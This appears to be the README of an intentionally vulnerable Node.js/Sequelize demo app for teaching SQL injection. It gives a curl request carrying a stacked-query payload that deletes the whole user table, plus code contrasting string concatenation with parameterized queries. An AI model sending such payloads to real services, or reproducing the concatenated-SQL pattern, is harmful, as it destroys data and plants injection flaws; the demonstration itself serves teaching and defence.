
This application is a demonstration prototype that shows how to perform an SQLi attack.


0xdbe-appsec/sqli-sequelize-mariadb


SQL Injection with Sequelize

This application is a demonstration prototype that shows how to perform an SQLi attack.

Install

  • Install node modules
      npm install
  • Create database
      sudo -u root mysql -u root < database.sql
  • Set env vars (in .env file)
      DB_PASSWORD=p4ssw0rd
  • Run
      npm start

Usage

  • Create user
      curl --header "Content-Type: application/json" \
          --request POST \
          --data '{"name":"Frodon Saque","password":"azerty"}' \
          http://localhost:3000/users
  • Use SQL injection to delete all users
      curl --header "Content-Type: application/json" \
          --request POST \
          --data '{"name":"Frodon Saque","password":"azerty'\''); DELETE FROM user; -- "}' \
          http://localhost:3000/users
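
Why the second request behaves differently from the first, as an added example that is not the repository's code: the `user` table name comes from the payload above, while the column names, the INSERT shape and all function names are assumptions. It builds the statement once by concatenation and once with parameters, then counts the statements each form yields for the request shown above.

```javascript
// Assumed shape of the INSERT behind POST /users (not taken from the repository).
// Vulnerable pattern: request fields are concatenated into the SQL text.
function buildInsertUnsafe(name, password) {
  return "INSERT INTO user (name, password) VALUES ('" + name + "', '" + password + "')";
}

// Parameterized pattern: the SQL text is constant and the values are handed to
// the library, e.g. sequelize.query(sql, { replacements }), never spliced in here.
function buildInsertParameterized(name, password) {
  const sql = "INSERT INTO user (name, password) VALUES (:name, :password)";
  return { sql, replacements: { name, password } };
}

// Minimal splitter: lists the statements contained in a SQL string, honouring
// single-quoted strings ('' and \' escapes) and "-- " line comments.
function splitStatements(sql) {
  const statements = [];
  let current = "";
  let inString = false;
  for (let i = 0; i < sql.length; i++) {
    const ch = sql[i];
    if (inString) {
      current += ch;
      if (ch === "\\" || (ch === "'" && sql[i + 1] === "'")) current += sql[++i] ?? "";
      else if (ch === "'") inString = false;
    } else if (ch === "-" && sql.startsWith("-- ", i)) {
      const eol = sql.indexOf("\n", i); // skip the comment up to end of line
      i = eol === -1 ? sql.length : eol;
    } else if (ch === ";") {
      if (current.trim()) statements.push(current.trim());
      current = "";
    } else {
      if (ch === "'") inString = true;
      current += ch;
    }
  }
  if (current.trim()) statements.push(current.trim());
  return statements;
}

// Constructed input: the password field from the second curl request above.
const PAGE_PASSWORD = "azerty'); DELETE FROM user; -- ";

function demo() {
  const unsafe = splitStatements(buildInsertUnsafe("Frodon Saque", PAGE_PASSWORD));
  const safe = buildInsertParameterized("Frodon Saque", PAGE_PASSWORD);
  return { unsafe, safeCount: splitStatements(safe.sql).length };
}
console.log(demo());
```

Whether the stacked `DELETE` actually executes also depends on the driver: the MariaDB Node.js connector only accepts several statements per query when `multipleStatements` is enabled, so leaving it off limits this particular payload but does not remove the injection.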

What still needs to be done

  • Add get users controller
